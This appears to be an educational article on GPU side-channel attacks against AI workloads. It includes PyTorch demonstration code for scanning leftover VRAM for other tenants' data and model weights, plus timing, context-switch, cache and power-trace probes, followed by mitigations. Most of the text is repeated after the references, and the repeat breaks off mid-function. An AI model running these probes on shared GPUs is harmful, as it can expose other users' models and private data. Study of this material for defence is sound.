GPU Memory Side-Channel Attacks

expert14 min readUpdated 2026-03-20

Side-channel attacks exploiting GPU memory allocation, timing, and electromagnetic emanation to extract sensitive data from AI workloads.

infrastructure gpu side-channel privacy hardware

Overview

GPUs were designed for parallel computation, not for multi-tenant security isolation. Unlike CPUs, which have decades of refinement in memory protection (virtual memory, page tables, protection rings), GPU memory management is fundamentally simpler. NVIDIA GPUs use a unified VRAM pool that is managed by the CUDA driver, and the isolation guarantees depend on the sharing mode (exclusive, time-sliced, MPS, or MIG).

This creates side-channel opportunities that do not exist on CPUs. When GPU memory is allocated and freed, the data persists in VRAM until overwritten. When multiple workloads share a GPU, timing differences in memory operations leak information about other workloads. Even physical side channels — power consumption and electromagnetic emanation — carry information about the computations being performed on the GPU.

These side channels are directly relevant to AI security because AI workloads process sensitive data: model weights (intellectual property), inference inputs (user data, business queries), and training data (which may include PII, medical records, or financial data). This article covers the known GPU side-channel attack classes, provides practical demonstration code, and evaluates the effectiveness of available mitigations.

The attacks described here draw on research including Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018), and Wei et al., "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020).

GPU Memory Architecture

VRAM Management

NVIDIA GPUs manage VRAM through the CUDA driver, which allocates memory in blocks. Unlike CPU virtual memory, GPU memory allocation does not zero-initialize by default in all contexts. The CUDA runtime's cudaMalloc does not guarantee that allocated memory is cleared, meaning newly allocated buffers may contain data from previous allocations.

import torch
import numpy as np
from typing import Dict, List, Optional, Tuple
 
class GPUMemoryResidualScanner:
    """
    Scan GPU memory for residual data from previous workloads.
    Demonstrates the GPU memory residual side channel.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
        if not torch.cuda.is_available():
            raise RuntimeError("CUDA is not available")
 
    def allocate_and_scan(
        self,
        size_mb: int = 256,
        num_blocks: int = 10,
    ) -> List[Dict]:
        """
        Allocate GPU memory blocks and check for non-zero residual data.
 
        This demonstrates that GPU memory may contain data from previous
        allocations by other processes on the same GPU.
        """
        findings = []
 
        for i in range(num_blocks):
            # Allocate without initialization
            num_elements = (size_mb * 1024 * 1024) // 4  # float32 = 4 bytes
            try:
                # Use empty (not zeros) to avoid initialization
                tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
                # Check for non-zero values (residual data)
                non_zero_count = torch.count_nonzero(tensor).item()
                non_zero_ratio = non_zero_count / num_elements
 
                # Statistical analysis of residual data
                if non_zero_count > 0:
                    non_zero_values = tensor[tensor != 0]
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": non_zero_count,
                        "non_zero_ratio": non_zero_ratio,
                        "sample_values": non_zero_values[:10].cpu().tolist(),
                        "min_value": non_zero_values.min().item(),
                        "max_value": non_zero_values.max().item(),
                        "finding": "RESIDUAL_DATA_FOUND",
                    })
                else:
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": 0,
                        "finding": "CLEAN",
                    })
 
                del tensor
                torch.cuda.empty_cache()
 
            except torch.cuda.OutOfMemoryError:
                findings.append({
                    "block": i,
                    "finding": "OOM — could not allocate",
                })
 
        return findings
 
    def scan_for_model_weights(
        self, size_mb: int = 512
    ) -> Dict:
        """
        Attempt to detect residual model weight patterns in GPU memory.
        Model weights typically follow specific statistical distributions
        (approximately normal for transformer layers).
        """
        num_elements = (size_mb * 1024 * 1024) // 4
        tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
        non_zero = tensor[tensor != 0]
        if len(non_zero) == 0:
            return {"found": False, "detail": "No residual data"}
 
        # Check if the distribution looks like model weights
        mean = non_zero.mean().item()
        std = non_zero.std().item()
        kurtosis_val = ((non_zero - mean) ** 4).mean().item() / (std ** 4) - 3
 
        looks_like_weights = (
            abs(mean) < 0.5  # Weights are typically near zero
            and 0.001 < std < 1.0  # Reasonable weight scale
            and abs(kurtosis_val) < 10  # Not too heavy-tailed
        )
 
        del tensor
        torch.cuda.empty_cache()
 
        return {
            "found": looks_like_weights,
            "statistics": {
                "mean": mean,
                "std": std,
                "kurtosis": kurtosis_val,
                "sample_size": len(non_zero),
            },
            "interpretation": (
                "Residual data matches typical model weight distribution"
                if looks_like_weights
                else "Residual data does not match weight patterns"
            ),
        }

Memory Allocation Timing

The time taken to allocate GPU memory depends on the current memory state, which is influenced by other workloads. By measuring allocation timing, an attacker can infer information about co-resident workloads:

import torch
import time
from typing import List, Dict
 
class GPUTimingSideChannel:
    """
    Demonstrate GPU memory timing side channels.
    Allocation and computation timing varies based on co-resident workloads.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def measure_allocation_timing(
        self,
        sizes_mb: List[int] = None,
        num_samples: int = 100,
    ) -> List[Dict]:
        """
        Measure GPU memory allocation timing at various sizes.
        Timing variations can reveal co-resident workload activity.
        """
        if sizes_mb is None:
            sizes_mb = [1, 10, 50, 100, 500]
 
        results = []
        for size_mb in sizes_mb:
            num_elements = (size_mb * 1024 * 1024) // 4
            timings = []
 
            for _ in range(num_samples):
                torch.cuda.synchronize()
                start = time.perf_counter_ns()
 
                try:
                    t = torch.empty(num_elements, dtype=torch.float32, device=self.device)
                    torch.cuda.synchronize()
                    elapsed_ns = time.perf_counter_ns() - start
                    timings.append(elapsed_ns)
                    del t
                    torch.cuda.empty_cache()
                except torch.cuda.OutOfMemoryError:
                    break
 
            if timings:
                results.append({
                    "size_mb": size_mb,
                    "mean_ns": sum(timings) / len(timings),
                    "min_ns": min(timings),
                    "max_ns": max(timings),
                    "std_ns": (
                        sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                    ) ** 0.5,
                    "samples": len(timings),
                })
 
        return results
 
    def measure_inference_timing(
        self,
        model: torch.nn.Module,
        input_sizes: List[Tuple[int, ...]],
        num_samples: int = 50,
    ) -> List[Dict]:
        """
        Measure inference timing across different input sizes.
        Timing reveals information about model architecture.
        """
        model.eval()
        results = []
 
        for input_size in input_sizes:
            timings = []
 
            for _ in range(num_samples):
                x = torch.randn(*input_size, device=self.device)
 
                # Warm up
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
 
                # Measure
                start = time.perf_counter_ns()
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
                elapsed_ns = time.perf_counter_ns() - start
 
                timings.append(elapsed_ns)
                del x
 
            results.append({
                "input_size": input_size,
                "mean_us": sum(timings) / len(timings) / 1000,
                "std_us": (
                    sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                ) ** 0.5 / 1000,
                "samples": len(timings),
            })
 
        return results

Context-Switching Side Channels

When multiple processes share a GPU via time-slicing (the default on consumer GPUs and many cloud instances), the GPU switches context between processes. Each context switch causes measurable performance interference.

Wei et al. demonstrated in "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) that by running a spy process that monitors its own performance during context switches, an attacker can infer:

Whether a neural network is running on the shared GPU
The model architecture (number of layers, layer types)
The input data properties (image dimensions, batch size)

import torch
import time
from typing import Dict, List
 
class ContextSwitchSpy:
    """
    Monitor GPU context switching to infer co-resident workload properties.
    Based on concepts from Wei et al. (IEEE DSN 2020).
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def run_spy_kernel(
        self,
        duration_seconds: float = 5.0,
        probe_size: int = 1024,
    ) -> List[Dict]:
        """
        Run a continuous probe kernel and measure timing variations.
        Timing spikes indicate GPU context switches to other workloads.
        """
        probe = torch.randn(probe_size, probe_size, device=self.device)
        measurements = []
        start_time = time.perf_counter()
 
        while time.perf_counter() - start_time < duration_seconds:
            torch.cuda.synchronize()
            op_start = time.perf_counter_ns()
 
            # Simple matrix multiply as timing probe
            result = torch.mm(probe, probe)
            torch.cuda.synchronize()
 
            op_end = time.perf_counter_ns()
            elapsed_ns = op_end - op_start
 
            measurements.append({
                "timestamp_ns": op_start,
                "duration_ns": elapsed_ns,
            })
 
            del result
 
        # Analyze timing variations
        durations = [m["duration_ns"] for m in measurements]
        mean_duration = sum(durations) / len(durations)
        threshold = mean_duration * 2  # Context switch causes >2x slowdown
 
        context_switches = [
            m for m in measurements if m["duration_ns"] > threshold
        ]
 
        return {
            "total_probes": len(measurements),
            "mean_duration_ns": mean_duration,
            "context_switches_detected": len(context_switches),
            "switch_ratio": len(context_switches) / len(measurements) if measurements else 0,
            "interpretation": (
                "Co-resident GPU workload detected"
                if len(context_switches) > len(measurements) * 0.05
                else "No significant co-resident activity detected"
            ),
        }
 
    def infer_layer_structure(
        self,
        measurements: List[Dict],
        expected_layer_duration_us: float = 100,
    ) -> Dict:
        """
        Attempt to infer neural network layer structure from timing patterns.
        Different layer types (conv, attention, linear) have characteristic timing signatures.
        """
        # Group context switch gaps into clusters that may correspond to layers
        durations = [m["duration_ns"] for m in measurements]
        mean_d = sum(durations) / len(durations)
 
        # Find timing pattern periodicity
        anomalies = []
        for i, d in enumerate(durations):
            if d > mean_d * 1.5:
                anomalies.append(i)
 
        if len(anomalies) < 2:
            return {"inference_possible": False, "reason": "Insufficient anomaly data"}
 
        # Calculate intervals between anomalies
        intervals = [
            anomalies[i+1] - anomalies[i]
            for i in range(len(anomalies) - 1)
        ]
 
        # Look for periodicity (suggesting repeated layer execution)
        if intervals:
            mean_interval = sum(intervals) / len(intervals)
            interval_std = (
                sum((i - mean_interval)**2 for i in intervals) / len(intervals)
            ) ** 0.5
 
            periodic = interval_std / mean_interval < 0.3 if mean_interval > 0 else False
 
            return {
                "inference_possible": True,
                "anomaly_count": len(anomalies),
                "mean_interval": mean_interval,
                "periodic": periodic,
                "estimated_layers": len(anomalies) if periodic else "unknown",
                "interpretation": (
                    f"Detected periodic pattern suggesting ~{len(anomalies)} layer executions"
                    if periodic
                    else "Detected activity but could not determine layer structure"
                ),
            }
 
        return {"inference_possible": False, "reason": "No clear pattern"}

Cache-Based Side Channels

GPU Cache Contention

Modern GPUs have L1 and L2 caches. In shared GPU environments, cache contention between workloads creates observable timing differences:

import torch
import time
from typing import Dict, List
 
class GPUCacheSideChannel:
    """
    Demonstrate GPU cache-based side channels.
    Cache contention from co-resident workloads causes measurable timing variations.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def prime_and_probe(
        self,
        array_size: int = 4 * 1024 * 1024,  # 4M elements ~= 16MB at float32
        num_rounds: int = 100,
    ) -> Dict:
        """
        GPU adaptation of Prime+Probe cache side channel.
 
        1. Prime: Fill GPU cache with known data
        2. Wait: Allow victim to execute (displacing some cache lines)
        3. Probe: Measure access time to our cached data
 
        Cache lines displaced by the victim will be slower to access.
        """
        # Create a large array that fills the L2 cache
        probe_array = torch.randn(array_size, dtype=torch.float32, device=self.device)
        access_pattern = torch.randperm(array_size, device=self.device)[:1024]
 
        baseline_times = []
        probe_times = []
 
        for round_idx in range(num_rounds):
            # PRIME: Access all elements to fill cache
            torch.cuda.synchronize()
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # PROBE (baseline — no victim activity between prime and probe)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            baseline_time = time.perf_counter_ns() - start
            baseline_times.append(baseline_time)
 
            # PRIME again
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # Small delay to allow potential co-resident activity
            time.sleep(0.001)
 
            # PROBE again (after potential victim activity)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            probe_time = time.perf_counter_ns() - start
            probe_times.append(probe_time)
 
        mean_baseline = sum(baseline_times) / len(baseline_times)
        mean_probe = sum(probe_times) / len(probe_times)
 
        return {
            "rounds": num_rounds,
            "mean_baseline_ns": mean_baseline,
            "mean_probe_ns": mean_probe,
            "timing_difference_ns": mean_probe - mean_baseline,
            "cache_contention_detected": mean_probe > mean_baseline * 1.2,
            "contention_ratio": mean_probe / mean_baseline if mean_baseline > 0 else 0,
        }

Power and Electromagnetic Side Channels

GPU power consumption correlates with computational activity. Research has shown that power traces can reveal:

Whether the GPU is performing matrix multiplication (training/inference) vs. memory operations
The size of the matrices being computed
Potentially, the values being processed (in extreme cases with high-resolution measurements)

These attacks require physical access to power measurement points or electromagnetic probes near the GPU, making them relevant primarily for:

Shared physical infrastructure (colocation data centers)
Edge AI devices where an attacker has physical access
Supply chain attacks where monitoring hardware is implanted

from typing import Dict, List, Optional
from dataclasses import dataclass
 
@dataclass
class PowerMeasurement:
    """Simulated GPU power measurement data point."""
    timestamp_us: float
    power_watts: float
    gpu_utilization_pct: float
 
class PowerSideChannelAnalyzer:
    """
    Analyze GPU power consumption traces for information leakage.
 
    In practice, power measurements come from:
    - nvidia-smi (low resolution, ~1 second)
    - NVML API (higher resolution, ~100ms)
    - External power meters (highest resolution)
    """
 
    def analyze_power_trace(
        self,
        measurements: List[PowerMeasurement],
    ) -> Dict:
        """Analyze a power consumption trace for patterns."""
        if not measurements:
            return {"analysis": "no_data"}
 
        powers = [m.power_watts for m in measurements]
        timestamps = [m.timestamp_us for m in measurements]
 
        # Detect computation phases
        mean_power = sum(powers) / len(powers)
        phases = []
        current_phase = "idle" if powers[0] < mean_power else "active"
        phase_start = 0
 
        for i in range(1, len(powers)):
            new_phase = "idle" if powers[i] < mean_power * 0.8 else "active"
            if new_phase != current_phase:
                phases.append({
                    "type": current_phase,
                    "start_idx": phase_start,
                    "end_idx": i,
                    "duration_us": timestamps[i] - timestamps[phase_start],
                    "mean_power": sum(powers[phase_start:i]) / (i - phase_start),
                })
                current_phase = new_phase
                phase_start = i
 
        active_phases = [p for p in phases if p["type"] == "active"]
 
        return {
            "total_measurements": len(measurements),
            "mean_power_watts": mean_power,
            "max_power_watts": max(powers),
            "min_power_watts": min(powers),
            "computation_phases": len(active_phases),
            "phase_details": active_phases[:10],
            "interpretation": (
                f"Detected {len(active_phases)} computation phases — "
                "may correspond to model layers or inference batches"
            ),
        }
 
    def detect_model_architecture_from_power(
        self, phases: List[Dict]
    ) -> Dict:
        """
        Attempt to infer model architecture from power consumption patterns.
        Different layer types have characteristic power signatures.
        """
        if len(phases) < 3:
            return {"inference_possible": False}
 
        # Attention layers: high power, longer duration
        # Linear layers: moderate power, shorter duration
        # Normalization: low power, very short duration
        layer_classifications = []
        for phase in phases:
            power = phase.get("mean_power", 0)
            duration = phase.get("duration_us", 0)
 
            if power > 250 and duration > 1000:
                layer_classifications.append("attention_or_matmul")
            elif power > 150 and duration > 500:
                layer_classifications.append("linear")
            elif duration < 200:
                layer_classifications.append("normalization_or_activation")
            else:
                layer_classifications.append("unknown")
 
        return {
            "inference_possible": True,
            "estimated_layers": len(layer_classifications),
            "layer_types": layer_classifications,
            "attention_layers": layer_classifications.count("attention_or_matmul"),
            "linear_layers": layer_classifications.count("linear"),
        }

Mitigations

Software Mitigations

import torch
from typing import Optional
 
class GPUSideChannelMitigation:
    """Software mitigations for GPU side-channel attacks."""
 
    @staticmethod
    def secure_allocate(
        size: tuple,
        dtype: torch.dtype = torch.float32,
        device: str = "cuda:0",
    ) -> torch.Tensor:
        """Allocate GPU memory and zero-initialize it to prevent residual data leakage."""
        tensor = torch.zeros(size, dtype=dtype, device=torch.device(device))
        return tensor
 
    @staticmethod
    def secure_deallocate(tensor: torch.Tensor) -> None:
        """Securely deallocate a tensor by overwriting with zeros before freeing."""
        if tensor.is_cuda:
            tensor.zero_()
            torch.cuda.synchronize()
        del tensor
        torch.cuda.empty_cache()
 
    @staticmethod
    def add_timing_noise(
        min_delay_ms: float = 0.1,
        max_delay_ms: float = 1.0,
    ) -> None:
        """
        Add random timing noise to inference operations.
        Makes timing side channels less reliable.
        """
        import random
        delay = random.uniform(min_delay_ms, max_delay_ms) / 1000
        time.sleep(delay)
 
    @staticmethod
    def constant_time_inference(
        model: torch.nn.Module,
        input_tensor: torch.Tensor,
        fixed_duration_ms: float = 100,
    ) -> torch.Tensor:
        """
        Execute inference and pad to a fixed duration.
        Prevents timing side channels by making all inferences take the same time.
        """
        start = time.perf_counter()
 
        with torch.no_grad():
            output = model(input_tensor)
        torch.cuda.synchronize()
 
        elapsed_ms = (time.perf_counter() - start) * 1000
        remaining_ms = fixed_duration_ms - elapsed_ms
        if remaining_ms > 0:
            time.sleep(remaining_ms / 1000)
 
        return output

Hardware Mitigations

Mitigation	Effectiveness	Performance Impact	Availability
MIG (Multi-Instance GPU)	High — hardware isolation	Reduces per-instance compute	A100, H100
NVIDIA Confidential Computing	Very High — encrypted GPU memory	5-15% overhead	H100
GPU Memory Scrubbing	Medium — removes residuals	Adds allocation latency	Software-configurable
Separate GPU per workload	Complete — no sharing	Expensive	Any GPU
IOMMU	Medium — prevents DMA attacks	Minimal	CPU/chipset dependent

Defensive Recommendations

Use MIG for multi-tenant GPU environments to achieve hardware-enforced memory isolation
Zero-initialize GPU memory on allocation to prevent residual data leakage
Zero-fill GPU memory before freeing sensitive tensors
Use NVIDIA Confidential Computing (H100) for sensitive inference workloads
Avoid GPU time-slicing for security-sensitive workloads — use dedicated GPUs or MIG instances
Add timing noise to inference operations to defeat timing side channels
Monitor GPU power consumption for anomalous patterns that may indicate side-channel attacks
Enable IOMMU to prevent DMA-based memory access from compromised GPU workloads

References

Naghibijouybari et al. — "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018) — foundational GPU side channel research
Wei et al. — "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) — model architecture inference from context switching
Zhu et al. — "Hermes Attack: Steal DNN Models with Lossless Inference Accuracy" (USENIX Security 2021) — model extraction via GPU side channels
NVIDIA Multi-Instance GPU — https://docs.nvidia.com/datacenter/tesla/mig-user-guide/
NVIDIA Confidential Computing — https://developer.nvidia.com/confidential-computing
MITRE ATLAS — AML.T0024 (Exfiltration via ML Inference API)

Edit this page on GitHub

GPU Memory Side-Channel Attacks

expert14 min readUpdated 2026-03-20

Side-channel attacks exploiting GPU memory allocation, timing, and electromagnetic emanation to extract sensitive data from AI workloads.

infrastructure gpu side-channel privacy hardware

Overview

GPU Memory Architecture

VRAM Management

import torch
import numpy as np
from typing import Dict, List, Optional, Tuple
 
class GPUMemoryResidualScanner:
    """
    Scan GPU memory for residual data from previous workloads.
    Demonstrates the GPU memory residual side channel.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
        if not torch.cuda.is_available():
            raise RuntimeError("CUDA is not available")
 
    def allocate_and_scan(
        self,
        size_mb: int = 256,
        num_blocks: int = 10,
    ) -> List[Dict]:
        """
        Allocate GPU memory blocks and check for non-zero residual data.
 
        This demonstrates that GPU memory may contain data from previous
        allocations by other processes on the same GPU.
        """
        findings = []
 
        for i in range(num_blocks):
            # Allocate without initialization
            num_elements = (size_mb * 1024 * 1024) // 4  # float32 = 4 bytes
            try:
                # Use empty (not zeros) to avoid initialization
                tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
                # Check for non-zero values (residual data)
                non_zero_count = torch.count_nonzero(tensor).item()
                non_zero_ratio = non_zero_count / num_elements
 
                # Statistical analysis of residual data
                if non_zero_count > 0:
                    non_zero_values = tensor[tensor != 0]
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": non_zero_count,
                        "non_zero_ratio": non_zero_ratio,
                        "sample_values": non_zero_values[:10].cpu().tolist(),
                        "min_value": non_zero_values.min().item(),
                        "max_value": non_zero_values.max().item(),
                        "finding": "RESIDUAL_DATA_FOUND",
                    })
                else:
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": 0,
                        "finding": "CLEAN",
                    })
 
                del tensor
                torch.cuda.empty_cache()
 
            except torch.cuda.OutOfMemoryError:
                findings.append({
                    "block": i,
                    "finding": "OOM — could not allocate",
                })
 
        return findings
 
    def scan_for_model_weights(
        self, size_mb: int = 512
    ) -> Dict:
        """
        Attempt to detect residual model weight patterns in GPU memory.
        Model weights typically follow specific statistical distributions
        (approximately normal for transformer layers).
        """
        num_elements = (size_mb * 1024 * 1024) // 4
        tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
        non_zero = tensor[tensor != 0]
        if len(non_zero) == 0:
            return {"found": False, "detail": "No residual data"}
 
        # Check if the distribution looks like model weights
        mean = non_zero.mean().item()
        std = non_zero.std().item()
        kurtosis_val = ((non_zero - mean) ** 4).mean().item() / (std ** 4) - 3
 
        looks_like_weights = (
            abs(mean) < 0.5  # Weights are typically near zero
            and 0.001 < std < 1.0  # Reasonable weight scale
            and abs(kurtosis_val) < 10  # Not too heavy-tailed
        )
 
        del tensor
        torch.cuda.empty_cache()
 
        return {
            "found": looks_like_weights,
            "statistics": {
                "mean": mean,
                "std": std,
                "kurtosis": kurtosis_val,
                "sample_size": len(non_zero),
            },
            "interpretation": (
                "Residual data matches typical model weight distribution"
                if looks_like_weights
                else "Residual data does not match weight patterns"
            ),
        }

Memory Allocation Timing

import torch
import time
from typing import List, Dict
 
class GPUTimingSideChannel:
    """
    Demonstrate GPU memory timing side channels.
    Allocation and computation timing varies based on co-resident workloads.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def measure_allocation_timing(
        self,
        sizes_mb: List[int] = None,
        num_samples: int = 100,
    ) -> List[Dict]:
        """
        Measure GPU memory allocation timing at various sizes.
        Timing variations can reveal co-resident workload activity.
        """
        if sizes_mb is None:
            sizes_mb = [1, 10, 50, 100, 500]
 
        results = []
        for size_mb in sizes_mb:
            num_elements = (size_mb * 1024 * 1024) // 4
            timings = []
 
            for _ in range(num_samples):
                torch.cuda.synchronize()
                start = time.perf_counter_ns()
 
                try:
                    t = torch.empty(num_elements, dtype=torch.float32, device=self.device)
                    torch.cuda.synchronize()
                    elapsed_ns = time.perf_counter_ns() - start
                    timings.append(elapsed_ns)
                    del t
                    torch.cuda.empty_cache()
                except torch.cuda.OutOfMemoryError:
                    break
 
            if timings:
                results.append({
                    "size_mb": size_mb,
                    "mean_ns": sum(timings) / len(timings),
                    "min_ns": min(timings),
                    "max_ns": max(timings),
                    "std_ns": (
                        sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                    ) ** 0.5,
                    "samples": len(timings),
                })
 
        return results
 
    def measure_inference_timing(
        self,
        model: torch.nn.Module,
        input_sizes: List[Tuple[int, ...]],
        num_samples: int = 50,
    ) -> List[Dict]:
        """
        Measure inference timing across different input sizes.
        Timing reveals information about model architecture.
        """
        model.eval()
        results = []
 
        for input_size in input_sizes:
            timings = []
 
            for _ in range(num_samples):
                x = torch.randn(*input_size, device=self.device)
 
                # Warm up
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
 
                # Measure
                start = time.perf_counter_ns()
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
                elapsed_ns = time.perf_counter_ns() - start
 
                timings.append(elapsed_ns)
                del x
 
            results.append({
                "input_size": input_size,
                "mean_us": sum(timings) / len(timings) / 1000,
                "std_us": (
                    sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                ) ** 0.5 / 1000,
                "samples": len(timings),
            })
 
        return results

Context-Switching Side Channels

Whether a neural network is running on the shared GPU
The model architecture (number of layers, layer types)
The input data properties (image dimensions, batch size)

import torch
import time
from typing import Dict, List
 
class ContextSwitchSpy:
    """
    Monitor GPU context switching to infer co-resident workload properties.
    Based on concepts from Wei et al. (IEEE DSN 2020).
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def run_spy_kernel(
        self,
        duration_seconds: float = 5.0,
        probe_size: int = 1024,
    ) -> List[Dict]:
        """
        Run a continuous probe kernel and measure timing variations.
        Timing spikes indicate GPU context switches to other workloads.
        """
        probe = torch.randn(probe_size, probe_size, device=self.device)
        measurements = []
        start_time = time.perf_counter()
 
        while time.perf_counter() - start_time < duration_seconds:
            torch.cuda.synchronize()
            op_start = time.perf_counter_ns()
 
            # Simple matrix multiply as timing probe
            result = torch.mm(probe, probe)
            torch.cuda.synchronize()
 
            op_end = time.perf_counter_ns()
            elapsed_ns = op_end - op_start
 
            measurements.append({
                "timestamp_ns": op_start,
                "duration_ns": elapsed_ns,
            })
 
            del result
 
        # Analyze timing variations
        durations = [m["duration_ns"] for m in measurements]
        mean_duration = sum(durations) / len(durations)
        threshold = mean_duration * 2  # Context switch causes >2x slowdown
 
        context_switches = [
            m for m in measurements if m["duration_ns"] > threshold
        ]
 
        return {
            "total_probes": len(measurements),
            "mean_duration_ns": mean_duration,
            "context_switches_detected": len(context_switches),
            "switch_ratio": len(context_switches) / len(measurements) if measurements else 0,
            "interpretation": (
                "Co-resident GPU workload detected"
                if len(context_switches) > len(measurements) * 0.05
                else "No significant co-resident activity detected"
            ),
        }
 
    def infer_layer_structure(
        self,
        measurements: List[Dict],
        expected_layer_duration_us: float = 100,
    ) -> Dict:
        """
        Attempt to infer neural network layer structure from timing patterns.
        Different layer types (conv, attention, linear) have characteristic timing signatures.
        """
        # Group context switch gaps into clusters that may correspond to layers
        durations = [m["duration_ns"] for m in measurements]
        mean_d = sum(durations) / len(durations)
 
        # Find timing pattern periodicity
        anomalies = []
        for i, d in enumerate(durations):
            if d > mean_d * 1.5:
                anomalies.append(i)
 
        if len(anomalies) < 2:
            return {"inference_possible": False, "reason": "Insufficient anomaly data"}
 
        # Calculate intervals between anomalies
        intervals = [
            anomalies[i+1] - anomalies[i]
            for i in range(len(anomalies) - 1)
        ]
 
        # Look for periodicity (suggesting repeated layer execution)
        if intervals:
            mean_interval = sum(intervals) / len(intervals)
            interval_std = (
                sum((i - mean_interval)**2 for i in intervals) / len(intervals)
            ) ** 0.5
 
            periodic = interval_std / mean_interval < 0.3 if mean_interval > 0 else False
 
            return {
                "inference_possible": True,
                "anomaly_count": len(anomalies),
                "mean_interval": mean_interval,
                "periodic": periodic,
                "estimated_layers": len(anomalies) if periodic else "unknown",
                "interpretation": (
                    f"Detected periodic pattern suggesting ~{len(anomalies)} layer executions"
                    if periodic
                    else "Detected activity but could not determine layer structure"
                ),
            }
 
        return {"inference_possible": False, "reason": "No clear pattern"}

Cache-Based Side Channels

GPU Cache Contention

Modern GPUs have L1 and L2 caches. In shared GPU environments, cache contention between workloads creates observable timing differences:

import torch
import time
from typing import Dict, List
 
class GPUCacheSideChannel:
    """
    Demonstrate GPU cache-based side channels.
    Cache contention from co-resident workloads causes measurable timing variations.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def prime_and_probe(
        self,
        array_size: int = 4 * 1024 * 1024,  # 4M elements ~= 16MB at float32
        num_rounds: int = 100,
    ) -> Dict:
        """
        GPU adaptation of Prime+Probe cache side channel.
 
        1. Prime: Fill GPU cache with known data
        2. Wait: Allow victim to execute (displacing some cache lines)
        3. Probe: Measure access time to our cached data
 
        Cache lines displaced by the victim will be slower to access.
        """
        # Create a large array that fills the L2 cache
        probe_array = torch.randn(array_size, dtype=torch.float32, device=self.device)
        access_pattern = torch.randperm(array_size, device=self.device)[:1024]
 
        baseline_times = []
        probe_times = []
 
        for round_idx in range(num_rounds):
            # PRIME: Access all elements to fill cache
            torch.cuda.synchronize()
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # PROBE (baseline — no victim activity between prime and probe)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            baseline_time = time.perf_counter_ns() - start
            baseline_times.append(baseline_time)
 
            # PRIME again
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # Small delay to allow potential co-resident activity
            time.sleep(0.001)
 
            # PROBE again (after potential victim activity)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            probe_time = time.perf_counter_ns() - start
            probe_times.append(probe_time)
 
        mean_baseline = sum(baseline_times) / len(baseline_times)
        mean_probe = sum(probe_times) / len(probe_times)
 
        return {
            "rounds": num_rounds,
            "mean_baseline_ns": mean_baseline,
            "mean_probe_ns": mean_probe,
            "timing_difference_ns": mean_probe - mean_baseline,
            "cache_contention_detected": mean_probe > mean_baseline * 1.2,
            "contention_ratio": mean_probe / mean_baseline if mean_baseline > 0 else 0,
        }

Power and Electromagnetic Side Channels

GPU power consumption correlates with computational activity. Research has shown that power traces can reveal:

Whether the GPU is performing matrix multiplication (training/inference) vs. memory operations
The size of the matrices being computed
Potentially, the values being processed (in extreme cases with high-resolution measurements)

These attacks require physical access to power measurement points or electromagnetic probes near the GPU, making them relevant primarily for:

Shared physical infrastructure (colocation data centers)
Edge AI devices where an attacker has physical access
Supply chain attacks where monitoring hardware is implanted

from typing import Dict, List, Optional
from dataclasses import dataclass
 
@dataclass
class PowerMeasurement:
    """Simulated GPU power measurement data point."""
    timestamp_us: float
    power_watts: float
    gpu_utilization_pct: float
 
class PowerSideChannelAnalyzer:
    """
    Analyze GPU power consumption traces for information leakage.
 
    In practice, power measurements come from:
    - nvidia-smi (low resolution, ~1 second)
    - NVML API (higher resolution, ~100ms)
    - External power meters (highest resolution)
    """
 
    def analyze_power_trace(
        self,
        measurements: List[PowerMeasurement],
    ) -> Dict:
        """Analyze a power consumption trace for patterns."""
        if not measurements:
            return {"analysis": "no_data"}
 
        powers = [m.power_watts for m in measurements]
        timestamps = [m.timestamp_us for m in measurements]
 
        # Detect computation phases
        mean_power = sum(powers) / len(powers)
        phases = []
        current_phase = "idle" if powers[0] < mean_power else "active"
        phase_start = 0
 
        for i in range(1, len(powers)):
            new_phase = "idle" if powers[i] < mean_power * 0.8 else "active"
            if new_phase != current_phase:
                phases.append({
                    "type": current_phase,
                    "start_idx": phase_start,
                    "end_idx": i,
                    "duration_us": timestamps[i] - timestamps[phase_start],
